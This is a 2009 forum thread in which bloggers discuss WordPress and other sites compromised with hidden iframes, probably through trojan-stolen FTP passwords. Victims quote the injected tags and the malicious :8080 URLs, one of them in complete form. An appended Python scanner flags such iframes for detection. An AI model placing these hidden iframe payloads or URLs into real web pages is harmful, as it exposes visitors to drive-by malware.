
lol hacked....freakin wp....hacked!!!

Discussion in 'Blogging' started by shylesson, Aug 18, 2009.

  1. shylesson

    shylesson Power Member

    Joined:
    Jan 10, 2008
    Messages:
    665
    Likes Received:
    2,090
    Location:
    ‹^›‹(•¿•)›‹^›
    smh.... I'm laughing from delirium ...really... I mean it's just so freaking funny... And I can't figure out why or how... well why doesn't really matter; I Googled and found lots of other sites hacked with the same iframe so I'm not the target specifically, but damn man....freakin A.... hackeddddddddddddddd

    before you say:

    1. they were various blogs and not even all that were on the same host/account. Meaning:
    a. I have one reseller account that has 4 'accounts' on it. On one of those accounts I have 15 blogs. Only 7 were 'affected'. Of those 7, 6 were wp v 2.7.1 and 1 was 2.8.2. Of those 7, 2 were established last year. One of those two was established the same year as another one of those 15 blogs and yet that one was not affected.
    b. None of the blogs on the other 'accounts' were affected even though they were created only a month before the ones on the affected account.

    2. I did not update my older blogs because of the recent problems with the latest versions of wp and the plugins I was using so I decided to wait until everything was fixed, but the afflicted sites varied in their wp versions!

    3. I did not use the same passwords on any of the blogs.

    4. I manually installed half of the afflicted blogs! [and before you say it, I manually installed some of the ones not afflicted too]. M A N U A L L Y! I was sooooo manual about it that I made nifty db names and db user names and nifty passwords and generated new 'security' keys for each and every config file...........GRRRRRRRRRRRRRRRRRR......

    5. I haven't found another blog on my other accounts yet that has been affected and these are blogs I setup either on the same day or same week or monthish as many of the afflicted blogs. Before you say anything THERE:
    a. Most of those accounts are with the same host as the ones affected [hostgator btw]
    b. I haven't updated those either but they vary in wp versions too.

    idk what went wrong. :/

    All variations of this link are iframed in the afflicted files too:

    Code:
    http://c9u.at:8080/ts/in.cgi?pepsi147
    I wouldn't even have noticed if I didn't actually login to my adsense and notice some channels not performing. GAWD! K so this is my first time being hacked [scratch that--I have been hacked before, but not while using Wordpress] so I am just blah. But at least now I have stopped laughing... the delirium has subsided...I needed to vent....Now to fix the sites............gawd.
     
  2. jonnyh431

    jonnyh431 Junior Member

    Joined:
    Jan 27, 2009
    Messages:
    165
    Likes Received:
    105
    Location:
    UK
    Did you set your file permissions to 777?
     
  3. shylesson

    shylesson Power Member

    .....................755
     
  4. jonnyh431

    jonnyh431 Junior Member

    Not sure then, could it have been someone you know? Or maybe a firefox password stealer/keylogger etc.
     
  5. stealthisblog

    stealthisblog Regular Member

    Joined:
    May 26, 2008
    Messages:
    289
    Likes Received:
    238
    Location:
    New York City
    The hacker either

    -hacked another site on the server you're on and got into your sites. This seems most logical, if they're aiming to make money from hacks they would most likely take over every site on a server they get into

    -exploited a plugin you're running

    -hacked your host (it happens surprisingly a lot)

    -bruteforced your wp installs (doubtful)

    -keylogged/trojaned you

    -got into your email and got the passwords - did you use your email pwd anywhere else?
     
  6. flybeta

    flybeta Junior Member

    Joined:
    Feb 7, 2009
    Messages:
    185
    Likes Received:
    14
    um, easy hack man: if before revision 2.8.4, they just reset ur pass. it's on the vulnerability list; ppl can just google the older revisions o_O
     
  7. adamster

    adamster Regular Member

    Joined:
    Nov 1, 2008
    Messages:
    210
    Likes Received:
    83
    If you are using a script which has been nulled from the net and has been installed on your server, make sure it doesn't have anything which looks suspicious. I know some people who have been hacked by using certain plugins shared around.
     
  8. shylesson

    shylesson Power Member

    My desktop had a trojan horse 4-5 days ago and I only use firefox. idk if I was logged into anything though--my gf was using it when she picked it up. I had to reload xp and do a fresh install. Would that have been an issue?

    But once I removed the iframes, I was still able to login to them using the correct passwords [which yes I changed too and changed all my other passwords].

    I got them all fixed up now. Off to bed. :/
     
  9. Nocali

    Nocali Newbie

    Joined:
    May 29, 2009
    Messages:
    41
    Likes Received:
    6
    Can you tell us which ones to look out for ?
     
  10. keinehabe

    keinehabe Supreme Member

    Joined:
    Nov 4, 2008
    Messages:
    1,207
    Likes Received:
    472
    Gender:
    Male
    Occupation:
    -= CEO =-
    Location:
    Heaven
    It's an xml vulnerability; everyone can be affected, and especially wp blogs :) Why? Because most of you guys leave "footprints" :)
     
  12. bluerickshaw

    bluerickshaw Junior Member

    Joined:
    Sep 23, 2008
    Messages:
    139
    Likes Received:
    40
    It's a trojan on your pc, I had it a week ago and there have been a few posts similar to this on BHW recently. It's a Virux or Virut variant, very nasty and can't be cleaned. You have to nuke your pc with the OS install discs.
     
  13. vokzzi

    vokzzi Registered Member

    Joined:
    May 29, 2008
    Messages:
    91
    Likes Received:
    20
    I have the same problem. index.php and default-filters.php and default-widgets.php in my wp installation tend to be infected. I also have a trojan on my computer. NOD32 found nothing now.
    I suspect that I got the trojan when I loaded and installed a wp theme I found on this forum. :bawling:
     
  14. onetoo3com

    onetoo3com Registered Member

    Joined:
    Mar 25, 2009
    Messages:
    92
    Likes Received:
    49
    How do you know if you have picked anything up if your AV hasn't detected it?
     
  15. oxonbeef

    oxonbeef BANNED BANNED

    Joined:
    Jan 4, 2009
    Messages:
    2,242
    Likes Received:
    7,872
    Download HijackThis 2.0.2, scan your pc with it and submit the text file for analysis.
     
  16. Sniper

    Sniper Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2008
    Messages:
    471
    Likes Received:
    213
    Location:
    Torrent Assault
    Remove the iframe as fast as possible or google will label the site as harmful in the search results and anyone who navigates to it using firefox will get an attack site warning. If this happens, you need to request an evaluation using webmaster tools.
     
  17. lizmoz

    lizmoz Power Member

    Joined:
    Oct 10, 2008
    Messages:
    560
    Likes Received:
    328
    Same shit happened to me. Trojan on my pc, logged into ftp account @ hosting provider..went through ALL my sites and inserted shit into the .php files. Same happened to you now. Your blogs were not hacked, but the ftp account passwords stolen.

    Am going to nuke it like bluerickshaw suggested to me too just to be sure.
     
  18. Nocali

    Nocali Newbie

    So what program or themes have you all used in common? It would be nice to know what's infected so we don't all end up in the same boat.
     
  19. Vbp6us

    Vbp6us Newbie

    Joined:
    Jul 24, 2009
    Messages:
    30
    Likes Received:
    1
    Location:
    Windsor
    Yes I am especially curious of the source too. Someone said it was an FTP account exploit. :eek: Any information on this? Security measures?

    Thanks
     
  20. KronusOfChaos

    KronusOfChaos Newbie

    Joined:
    Apr 23, 2009
    Messages:
    4
    Likes Received:
    9
    Occupation:
    IT Infrastructure Manager
    Location:
    Houston, Texas..... Where the Men are men and the
    Just an FYI. It's not just Wordpress that is being exploited. I had the same issue on a non WordPress Site that got hacked.... Here was what I found in several of my files:

    <iframe src="hxxp://cubanbigtop.cn:8080/index.ph
    <iframe src="hxxp://c6y.ru:8080/index.p
    <iframe src="hxxp://u3j.ru:8080/index.
    <iframe src="hxxp://u5m.ru:8080/index
    <iframe src="hxxp://q0j.ru:8080/inde
    <iframe src="hxxp://u0b.in:8080/ts/in.cgi?pe
    <iframe src="hxxp://x8b.in:8080/in
    <iframe src="hxxp://x9m.in:8080/index.php" width=155 height=152 style="visibility: hidden"></iframe>
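
An added example, not part of the thread or written by any poster: a small Python scanner that walks a web root and reports files containing iframes with the two traits visible in the tags quoted above (hidden styling and a `:8080` source). The function names, the file-suffix list and the `example.invalid` sample files are assumptions constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Traits of the injected tags quoted in the thread: hidden styling and a :8080 src.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
PORT_RE = re.compile(r"^[a-z]+://[^/]+:8080(?:/|$)", re.I)

def suspicious_iframes(text):
    """Return (src, reasons) for each iframe that is hidden or points at port 8080."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        src = SRC_RE.search(tag)
        url = src.group(1) if src else ""
        checks = (("hidden", HIDDEN_RE.search(tag)), ("port-8080", PORT_RE.match(url)))
        reasons = [name for name, hit in checks if hit]
        if reasons:
            hits.append((url, reasons))
    return hits

def scan_tree(root, suffixes=(".php", ".html", ".htm", ".js")):
    """Walk a web root and map each affected file to its suspicious iframes."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = suspicious_iframes(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Build a constructed web root (example.invalid hosts only) and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "wp-includes").mkdir()
        (root / "index.php").write_text(
            '<?php get_header(); ?>\n'
            '<iframe src="http://bad.example.invalid:8080/index.php" '
            'width=155 height=152 style="visibility: hidden"></iframe>\n')
        (root / "wp-includes" / "default-filters.php").write_text("<?php // clean\n")
        (root / "about.html").write_text(
            '<iframe src="https://video.example.invalid/embed/1" width=560></iframe>')
        return scan_tree(root)

if __name__ == "__main__":
    for name, hits in demo().items():
        print(name, hits)
```

A clean report from a scan like this only covers this one pattern; injected code in other forms would need a comparison against known-good copies of the files.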